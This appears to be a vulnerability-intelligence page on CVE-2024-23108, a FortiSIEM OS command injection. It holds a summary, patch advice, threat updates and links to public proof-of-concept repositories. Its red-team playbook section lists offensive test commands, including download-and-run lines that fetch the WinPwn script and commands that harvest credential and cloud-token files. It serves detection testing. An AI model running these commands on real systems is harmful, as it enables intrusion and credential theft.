CVE-2024-23108
Overview
This vulnerability is an OS command injection caused by improper neutralization of special elements within shell commands. The root cause lies in insufficient sanitization of the mount_point field in the XML parsing logic of the Phoenix Monitor service. This flaw affects Fortinet FortiSIEM versions 6.4.0 through 7.1.1, specifically within the component handling TEST_STORAGE elements.
Vulnerability Description
An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet allows attacker to execute unauthorized code or commands via via crafted API requests.
Impact
An unauthenticated attacker can execute arbitrary operating system commands on the FortiSIEM appliance, resulting in full system compromise. This includes the ability to exfiltrate sensitive monitoring data, move laterally within the network, and disable or bypass security monitoring functions. No user interaction or valid credentials are required, making exploitation straightforward and enabling complete control over the affected system.
Solution
Fortinet has released patches addressing this vulnerability in FortiSIEM versions beyond 7.1.1. Users should upgrade to the latest FortiSIEM release as detailed in Fortinet's advisory FG-IR-23-130 available at https://fortiguard.com/psirt/FG-IR-23-130. Administrators are advised to apply the official updates promptly to remediate the command injection flaw in the Phoenix Monitor service.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from an improper neutralization of special elements used in operating system commands, commonly referred to as an OS command injection flaw. This type of vulnerability occurs when an application fails to adequately sanitize user input, allowing an attacker to inject arbitrary commands that the underlying system can execute. In this case, the affected product is a security information and event management (SIEM) solution from Fortinet, which processes API requests. If an attacker can craft a malicious API request, they may gain the ability to execute unauthorized commands on the server, potentially leading to complete system compromise.
Attack vectors for exploiting this vulnerability are varied and can be executed remotely, making them particularly dangerous. An attacker could leverage social engineering tactics to trick a user into submitting a crafted API request or directly exploit the API if it is exposed to the internet. Once the attacker successfully injects commands, they could perform a range of malicious activities, such as data exfiltration, system manipulation, or even deploying malware. The ease of exploitation, combined with the potential for significant damage, highlights the critical nature of this vulnerability.
The real-world impact of such a vulnerability can be profound, especially for organizations relying on the affected Fortinet products for security monitoring and compliance. A successful exploitation could lead to unauthorized access to sensitive data, disruption of critical services, and loss of trust from clients and stakeholders. The business risks associated with this vulnerability include financial losses from remediation efforts, potential legal ramifications from data breaches, and reputational damage that could affect customer relationships and market position. Given the high CVSS score associated with this vulnerability, organizations must treat it with the utmost urgency.
Detection and mitigation strategies are essential to safeguard against the risks posed by this vulnerability. Organizations should implement robust input validation and sanitization measures to prevent the injection of malicious commands. Regular security assessments, including penetration testing and code reviews, can help identify and remediate vulnerabilities before they can be exploited. Additionally, organizations should ensure that they are running the latest versions of the affected Fortinet products, as vendors typically release patches to address known vulnerabilities. Monitoring API requests for unusual patterns or behaviors can also serve as an effective detection mechanism, allowing organizations to respond swiftly to potential exploitation attempts.
In conclusion, the OS command injection vulnerability in Fortinet's SIEM solution poses a significant threat to organizations that rely on these tools for their cybersecurity posture. With the potential for severe consequences stemming from exploitation, it is imperative for affected organizations to prioritize detection and mitigation strategies. By implementing best practices in input validation, maintaining up-to-date systems, and actively monitoring for suspicious activities, organizations can significantly reduce their risk exposure and enhance their overall security resilience.
The CVSS score adjustment from 9.8 to 9.7 for CVE-2024-23108 reflects a refined understanding of the vulnerability’s impact rather than a reduction in its criticality. CSURFACE threat intelligence confirms that the exploitability and potential damage remain exceptionally high, consistent with the original assessment. Our telemetry indicates that the exploitability prediction (EPSS) remains stable at a very elevated level, underscoring ongoing risk. Importantly, new proof-of-concept exploits have surfaced, demonstrating variations that may facilitate broader or more targeted attacks against Fortinet FortiSIEM deployments. While there is no current indication of a marked escalation in active exploitation campaigns, the availability of these refined exploits lowers the barrier for adversaries to weaponize this vulnerability. Consequently, the threat landscape remains severe, with persistent potential for unauthorized code execution and system compromise. Defenders should recognize that despite the slight CVSS score adjustment, the operational risk and attacker interest continue unabated, warranting sustained vigilance.
Update 2 — June 12, 2026
The CVSS score adjustment from 9.7 to 9.8 for CVE-2024-23108 reflects a refined understanding of the vulnerability’s criticality, underscoring its near-maximum impact potential. CSURFACE threat intelligence confirms that while the EPSS score remains stable, the availability of multiple proof-of-concept exploits on public repositories continues to lower the technical barrier for adversaries. Our telemetry indicates no marked escalation in active exploitation campaigns; however, the persistent presence of these refined exploits sustains a high operational risk for Fortinet FortiSIEM environments. This subtle score increase signals that the vulnerability’s exploitability and impact have been reassessed as slightly more severe, reinforcing the critical nature of this threat. Consequently, the threat level remains critically high, with ongoing adversary interest and potential for unauthorized code execution unchanged.
Update 3 — July 25, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-23108, evidenced by a recent emergence of new proof-of-concept exploits circulating publicly. Our telemetry reveals a sharp increase in detection activity related to crafted API requests designed to trigger this OS command injection vulnerability in Fortinet FortiSIEM. Although the EPSS score remains stable, the qualitative surge in exploit attempts indicates growing adversary interest and a lowering of the technical barrier to weaponization. This development heightens the operational risk for organizations running vulnerable FortiSIEM instances, as attackers are increasingly equipped with accessible tools to execute unauthorized commands remotely. Consequently, the threat level associated with CVE-2024-23108 should be considered elevated, underscoring the critical need for vigilance despite the absence of widespread active campaigns at this time.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | 7.1.0 |
cpe:2.3:a:fortinet:fortisiem:7.1.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | 7.1.1 |
cpe:2.3:a:fortinet:fortisiem:7.1.1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2024-23108
CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection
|
horizon3ai | 35 | 6 | 2024-05-20 | View |
|
hitem/CVE-2024-23108
POC iteration for CVE-2024-23108 which can use -l for list input
|
hitem | 6 | 1 | 2024-05-28 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-23108 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-23-130 |
| github.com |
NVD API
|
https://github.com/horizon3ai/CVE-2024-23108 |